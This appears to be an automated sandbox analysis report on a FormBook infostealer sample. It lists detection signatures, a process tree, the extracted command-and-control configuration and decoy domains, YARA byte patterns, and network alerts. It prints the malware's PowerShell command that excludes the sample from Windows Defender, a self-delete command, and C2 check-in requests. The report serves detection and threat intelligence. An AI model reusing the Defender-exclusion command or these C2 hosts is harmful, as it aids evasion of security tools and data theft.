Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JHnNxt6Pnb.exe

Overview

General Information

Sample name:JHnNxt6Pnb.exe
renamed because original name is a hash value
Original sample name:a6d2a47171f9630a8db62eb4001e196dfbad94cf40638e108cc649883d1bc069.exe
Analysis ID:1569252
MD5:b631685c5ef9ee26ded25c76ab3eda27
SHA1:03696b36c4838440cf8def9687117745c9edbd19
SHA256:a6d2a47171f9630a8db62eb4001e196dfbad94cf40638e108cc649883d1bc069
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Reads the DNS cache
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Uses ipconfig to lookup or modify the Windows network settings
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • JHnNxt6Pnb.exe (PID: 6796 cmdline: "C:\Users\user\Desktop\JHnNxt6Pnb.exe" MD5: B631685C5EF9EE26DED25C76AB3EDA27)
    • powershell.exe (PID: 916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4432 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • JHnNxt6Pnb.exe (PID: 964 cmdline: "C:\Users\user\Desktop\JHnNxt6Pnb.exe" MD5: B631685C5EF9EE26DED25C76AB3EDA27)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autoconv.exe (PID: 5956 cmdline: "C:\Windows\SysWOW64\autoconv.exe" MD5: A705C2ACED7DDB71AFB87C4ED384BED6)
        • ipconfig.exe (PID: 5460 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
          • cmd.exe (PID: 6636 cmdline: /c del "C:\Users\user\Desktop\JHnNxt6Pnb.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.f6b-crxy.top/cu29/"], "decoy": ["qidr.shop", "usinessaviationconsulting.net", "68716329.xyz", "nd-los.net", "ealthironcladguarantee.shop", "oftware-download-69354.bond", "48372305.top", "omeownershub.top", "mall-chilli.top", "ajakgoid.online", "ire-changer-53482.bond", "rugsrx.shop", "oyang123.info", "azino-forum-pro.online", "817715.rest", "layman.vip", "eb777.club", "ovatonica.net", "urgaslotvip.website", "inn-paaaa.buzz", "reativedreams.design", "upremehomes.shop", "ames-saaab.buzz", "phonelock.xyz", "ideandseekvacations.xyz", "77179ksuhr.top", "ental-bridges-87553.bond", "7win2.bet", "ainan.company", "5mwhs.top", "hopp9.top", "65fhgejd3.xyz", "olandopaintingllc.online", "n-wee.buzz", "reshcasinoinfo2.top", "5734.party", "qtbyj.live", "gil.lat", "siabgc4d.online", "fios.top", "sed-cars-89003.bond", "nlineschools-2507-001-sap.click", "upiloffatemotors.online", "ordf.top", "achhonglan.shop", "irex.info", "oursmile.vip", "leachlondonstore.online", "asukacro.online", "panish-classes-64045.bond", "apita.top", "srtio.xyz", "kdsclci.bond", "ochacha.sbs", "oldsteps.buzz", "yzq0n.top", "npostl.xyz", "ladder-cancer-symptoms-mine.sbs", "400725iimfyuj120.top", "3589.photo", "rasilhojenoticias.online", "ependableequipment.online", "itusbandar126.info", "ohns.app"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.JHnNxt6Pnb.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.JHnNxt6Pnb.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.JHnNxt6Pnb.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          4.2.JHnNxt6Pnb.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            4.2.JHnNxt6Pnb.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 5 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ParentImage: C:\Users\user\Desktop\JHnNxt6Pnb.exe, ParentProcessId: 6796, ParentProcessName: JHnNxt6Pnb.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ProcessId: 916, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ParentImage: C:\Users\user\Desktop\JHnNxt6Pnb.exe, ParentProcessId: 6796, ParentProcessName: JHnNxt6Pnb.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ProcessId: 916, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ParentImage: C:\Users\user\Desktop\JHnNxt6Pnb.exe, ParentProcessId: 6796, ParentProcessName: JHnNxt6Pnb.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\JHnNxt6Pnb.exe", ProcessId: 916, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-05T16:50:25.171196+010020314531Malware Command and Control Activity Detected192.168.2.84971685.13.166.1880TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: JHnNxt6Pnb.exeAvira: detected
            Found malware configuration
            Source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.f6b-crxy.top/cu29/"], "decoy": ["qidr.shop", "usinessaviationconsulting.net", "68716329.xyz", "nd-los.net", "ealthironcladguarantee.shop", "oftware-download-69354.bond", "48372305.top", "omeownershub.top", "mall-chilli.top", "ajakgoid.online", "ire-changer-53482.bond", "rugsrx.shop", "oyang123.info", "azino-forum-pro.online", "817715.rest", "layman.vip", "eb777.club", "ovatonica.net", "urgaslotvip.website", "inn-paaaa.buzz", "reativedreams.design", "upremehomes.shop", "ames-saaab.buzz", "phonelock.xyz", "ideandseekvacations.xyz", "77179ksuhr.top", "ental-bridges-87553.bond", "7win2.bet", "ainan.company", "5mwhs.top", "hopp9.top", "65fhgejd3.xyz", "olandopaintingllc.online", "n-wee.buzz", "reshcasinoinfo2.top", "5734.party", "qtbyj.live", "gil.lat", "siabgc4d.online", "fios.top", "sed-cars-89003.bond", "nlineschools-2507-001-sap.click", "upiloffatemotors.online", "ordf.top", "achhonglan.shop", "irex.info", "oursmile.vip", "leachlondonstore.online", "asukacro.online", "panish-classes-64045.bond", "apita.top", "srtio.xyz", "kdsclci.bond", "ochacha.sbs", "oldsteps.buzz", "yzq0n.top", "npostl.xyz", "ladder-cancer-symptoms-mine.sbs", "400725iimfyuj120.top", "3589.photo", "rasilhojenoticias.online", "ependableequipment.online", "itusbandar126.info", "ohns.app"]}
            Multi AV Scanner detection for submitted file
            Source: JHnNxt6Pnb.exeReversingLabs: Detection: 68%
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.JHnNxt6Pnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.JHnNxt6Pnb.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1541380008.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: JHnNxt6Pnb.exeJoe Sandbox ML: detected
            Source: JHnNxt6Pnb.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: JHnNxt6Pnb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ipconfig.pdb source: JHnNxt6Pnb.exe, 00000004.00000002.1669942696.0000000001930000.00000040.10000000.00040000.00000000.sdmp, JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001707000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: ipconfig.pdbGCTL source: JHnNxt6Pnb.exe, 00000004.00000002.1669942696.0000000001930000.00000040.10000000.00040000.00000000.sdmp, JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001707000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: JHnNxt6Pnb.exe, 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1671675082.000000000367D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1669527051.00000000034C9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: JHnNxt6Pnb.exe, JHnNxt6Pnb.exe, 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1671675082.000000000367D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1669527051.00000000034C9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4x nop then pop ebx4_2_00407B22
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx9_2_00E37B22

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49716 -> 85.13.166.18:80
            Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49716 -> 85.13.166.18:80
            Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49716 -> 85.13.166.18:80
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 85.13.166.18 80Jump to behavior
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: www.f6b-crxy.top/cu29/
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.68716329.xyz
            Tries to resolve many domain names, but no domain seems valid
            Source: unknownDNS traffic detected: query: www.68716329.xyz replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: www.apita.top replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: www.siabgc4d.online replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: www.48372305.top replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: www.f6b-crxy.top replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: www.oldsteps.buzz replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: www.yzq0n.top replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: www.77179ksuhr.top replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: www.azino-forum-pro.online replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: www.inn-paaaa.buzz replaycode: Name error (3)
            Source: global trafficHTTP traffic detected: GET /cu29/?MvvxBDN=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOM4azueTiHl&Bjk=7nwDmBCH2DD0oHhP HTTP/1.1Host: www.irex.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewASN Name: NMM-ASD-02742FriedersdorfHauptstrasse68DE NMM-ASD-02742FriedersdorfHauptstrasse68DE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exeCode function: 6_2_115DDF82 getaddrinfo,setsockopt,recv,6_2_115DDF82
            Source: global trafficHTTP traffic detected: GET /cu29/?MvvxBDN=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOM4azueTiHl&Bjk=7nwDmBCH2DD0oHhP HTTP/1.1Host: www.irex.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficDNS traffic detected: DNS query: www.inn-paaaa.buzz
            Source: global trafficDNS traffic detected: DNS query: www.irex.info
            Source: global trafficDNS traffic detected: DNS query: www.yzq0n.top
            Source: global trafficDNS traffic detected: DNS query: www.siabgc4d.online
            Source: global trafficDNS traffic detected: DNS query: www.48372305.top
            Source: global trafficDNS traffic detected: DNS query: www.77179ksuhr.top
            Source: global trafficDNS traffic detected: DNS query: www.f6b-crxy.top
            Source: global trafficDNS traffic detected: DNS query: www.azino-forum-pro.online
            Source: global trafficDNS traffic detected: DNS query: www.68716329.xyz
            Source: global trafficDNS traffic detected: DNS query: www.apita.top
            Source: global trafficDNS traffic detected: DNS query: www.oldsteps.buzz
            Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ccert.coml07
            Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076441838.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: explorer.exe, 00000006.00000002.4002256173.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1545593009.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
            Source: explorer.exe, 00000006.00000003.3076441838.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005528609.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: explorer.exe, 00000006.00000003.2285166751.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005157734.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: explorer.exe, 00000006.00000002.4004189778.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4004218342.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4001297704.0000000002C80000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: JHnNxt6Pnb.exe, 00000000.00000002.1539683468.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.48372305.top
            Source: explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.48372305.top/cu29/
            Source: explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.48372305.top/cu29/www.77179ksuhr.top
